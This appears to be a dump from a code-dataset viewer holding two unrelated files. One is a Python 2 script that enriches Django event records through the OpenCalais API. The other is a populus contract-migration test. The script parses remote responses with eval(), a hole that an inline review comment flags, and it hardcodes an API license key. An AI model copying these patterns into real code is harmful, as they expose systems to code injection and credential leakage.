key="ne62f3m8swrsv2cvmf78rkx2"
def call(body):
    """POST *body* to the OpenCalais enrich endpoint and return the parsed result.

    Returns the value parsed from the last response line.  Python 2 code.

    NOTE(review): the response is parsed with eval() — unsafe on untrusted
    responses; json.loads is the safe equivalent since the request asks
    for application/json.
    """
    url = "http://api.opencalais.com/tag/rs/enrich"
    opener = urllib2.build_opener(urllib2.HTTPHandler)
    request = urllib2.Request(url, data=body)
    request.add_header('content-type', 'text/raw')
    request.add_header('accept', 'application/json')
    request.add_header('x-calais-licenseID', key)
    # urllib2 has no native non-GET/POST support; force the method.
    request.get_method = lambda: 'POST'
    url = opener.open(request)
    print url
    for line in url.readlines():
        result = eval(line)
    return result
def fetch():
    """Enrich every Event via OpenCalais and store its entities as Meta rows.

    Events that already have Meta rows are skipped.  Python 2 code.
    """
    for e in Event.objects.all().order_by('start_time'):
        sentence = e.description
        name = e.name
        eventid = e.event_id
        # NOTE(review): `d` is unused; the filter is re-run in the check below.
        d = Meta.objects.filter(eventid=str(eventid))
        # NOTE(review): `is not 0` compares identity, not value — it works
        # for small ints in CPython, but `!= 0` (or a truth test) is correct.
        if len(Meta.objects.filter(eventid=str(eventid))) is not 0:
            print "present"
            continue
        result = call(name+' '+sentence)
        #pprint.pprint(result)
        #print name+' '+sentence
        #break
        for key, value in result.items():
            # 'doc' holds response metadata; language entries are not entities.
            if key == 'doc' or value.has_key('language'):
                continue
            insert(key, value, eventid)
            print key
        print '-------'
def insert(key, value, eventid):
    """Flatten one Calais entity dict into Meta rows (one row per instance).

    *key* is the Calais entity URI, *value* its attribute dict; missing
    attributes default to ''.  Python 2 code (print statement).
    """
    default = ''
    namer = shortnamer = tickerr = rid = default
    cid = key+'_'+str(eventid)
    eventid = eventid
    category = value.get('category', default)
    categoryName = value.get('categoryName', default)
    detection = value.get('detection', default)
    typeGroup = value.get('_typeGroup', default)
    typeG = value.get('_type', default)
    typeReference = value.get('_typeReference', default)
    score = value.get('score', default)
    classifierName = value.get('classifierName', default)
    url = value.get('url', default)
    name = value.get('name', default)
    nationality = value.get('nationality', default)
    resolutions = value.get('resolutions', default)
    resolutions_str = resolutions
    instances = value.get('instances', default)
    instances_str = instances
    # Identity checks against `default` work because .get returns that
    # exact sentinel object when the key is missing.
    # Only the first resolution is kept.
    if resolutions is not default:
        resolutions = resolutions[0]
        namer = resolutions.get('name', default)
        rid = resolutions.get('id', default)
        tickerr = resolutions.get('ticker', default)
        shortnamer = resolutions.get('shortname', default)
    # Fabricate a single empty instance when Calais supplied none, so the
    # loop below always runs at least once.
    if instances is default:
        instances = [{'suffix': default,
                      'prefix': default,
                      'detection': default,
                      'length': default,
                      'offset': default,
                      'exact' : default }]
    else:
        pass
        #print instances
        #instances = eval(instances)
    for inst in instances:
        # Random suffix keeps the primary key unique across instances.
        cid = cid+' '+str(random.randint(1,10))
        try:
            Meta.objects.create(cid=cid,
                                eventid=eventid,
                                category=category,
                                categoryName=categoryName,
                                detection=inst.get('detection', default),
                                typeGroup=typeGroup,
                                typeG=typeG,
                                typeReference=typeReference,
                                score=score,
                                classifierName=classifierName,
                                url=url,
                                name=name,
                                nationality=nationality,
                                resolutions=resolutions_str,
                                namer = namer,
                                tickerr = tickerr,
                                rid = rid,
                                shortnamer = shortnamer,
                                instances=instances_str,
                                suffix=inst.get('suffix', default),
                                prefix=inst.get('prefix', default),
                                length=inst.get('length', default),
                                offset=inst.get('offset', default),
                                exact=inst.get('exact', default),
                                )
        except Exception as e:
            print "eception occured",e


# Module runs the enrichment on import/execution.
fetch()
|
12,799 | 882118b818855a4476c3dbbba8f3bb5af00ed137 | from populus.migrations import (
Migration,
DeployContract,
)
from populus.migrations.writer import (
write_migration,
)
from populus.migrations.migration import (
get_migration_classes_for_execution,
)
def test_migrated_chain_fixture(project_dir, write_project_file, request,
                                MATH):
    """End-to-end check that the `chain` fixture applies pending migrations.

    Writes a Math contract plus one migration, then asserts the contract
    is unregistered before the fixture runs and registered afterwards.
    """
    write_project_file('contracts/Math.sol', MATH['source'])
    write_project_file('migrations/__init__.py')

    class TestMigration(Migration):
        migration_id = '0001_initial'
        dependencies = []
        operations = [
            DeployContract('Math'),
        ]
        compiled_contracts = {
            'Math': {
                'code': MATH['code'],
                'code_runtime': MATH['code_runtime'],
                'abi': MATH['abi'],
            },
        }

    with open('migrations/0001_initial.py', 'w') as migration_file:
        write_migration(migration_file, TestMigration)

    project = request.getfuncargvalue('project')
    assert len(project.migrations) == 1

    # Before the chain fixture runs, the contract must not be registered.
    unmigrated_chain = request.getfuncargvalue('unmigrated_chain')
    registrar = unmigrated_chain.registrar
    assert not registrar.call().exists('contract/Math')

    # Requesting `chain` triggers the migration.
    chain = request.getfuncargvalue('chain')
    assert registrar.call().exists('contract/Math')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.